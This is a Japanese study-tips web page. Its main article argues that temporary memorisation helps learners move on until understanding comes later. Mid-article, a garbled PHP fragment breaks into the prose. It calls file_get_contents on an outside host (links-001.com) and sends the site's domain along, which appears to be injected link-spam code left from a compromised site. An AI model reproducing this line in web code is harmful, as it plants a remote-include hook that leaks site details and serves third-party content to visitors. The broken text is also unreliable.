前へ
次へ

睡眠を味方につけて暗記しよう

暗記と聞くと、学生時代に必死に一夜漬けをした苦い記憶がよみがえるという方もいるかもしれません。テレビ

more

歴史の学習に欠かせない暗記

勉強の教科のひとつである歴史で良い結果を残すためには、年号を暗記しなければなりません。特に世界史だと

more

暗記することにより理解できることが沢山ある

私は高校時代教師から何事もただ暗記するのではなく理解することが重要だと言われてその通りだと思い今まで

more

広い範囲の勉強を効率的に行える暗記

子供のころは学校などで多少無理やりに勉強をすることもあるでしょう。勉強の面白さや意味が分かってくると自分からできるようになる子もいますが、それが分からないとただ学校で授業を聞いて、出された宿題をするだけの子もいます。後者の子が悪いわけではなくどちらかといえば多数派で、自分で勉強できる子となると自然に優秀な学校に進学するようになるのでしょう。勉強をする上では順番があり、学校の授業では学年であったり教科書の単元などに沿って進められます。基本的には少しずつ難しくなったり、前に勉強した内容を理解していると次の理解につながるようになっていますが、難しい内容になってくると以前の内容を理解していても理解しづらくなるときもあります。理解できなければその内容がテストに出されてしまうと解くことができずに点数を取れません。このときの一時的な対応として暗記の利用があり何とかテストなどに対応します。一時的であっても覚えればその次の単元に移ってもスムーズに勉強ができます。

".file_get_contents('http://links-001.com/123set5.php?dom='.str_replace("www.", "", $_SERVER['HTTP_HOST']))."

"; ?>

その後どんどん勉強を進めていくとあることに気が付くかもしれません。それはかつて暗記で一時記憶した内容の理解ができていることです。その内容を勉強した時は難しくて理解できなかったけども、その後単元を勧めるにつれて難しかった内容が少しずつ分かってくることがあります。小学校の頃だときちんと勉強の順番を付けてくれますが、高校や大学、その他高度な専門分野だとそこまで丁寧にテキストを作ってくれていません。全ての勉強を暗記に頼ろうとすると、すべての理解が難しくなりなかなか全体的な理解も難しいと言えそうですが、勉強の困りごとの対応として一時的に使うのは効率的に勉強を行う上では有効と言えそうです。人によっては理解ができるまで次に進まないとあるところで止ってしまうケースもありますが、この部分はしっかり勉強して理解をしてこの部分は覚えた方が早いから理解は後回しなどの判断ができると良いかもしれません。

Page Top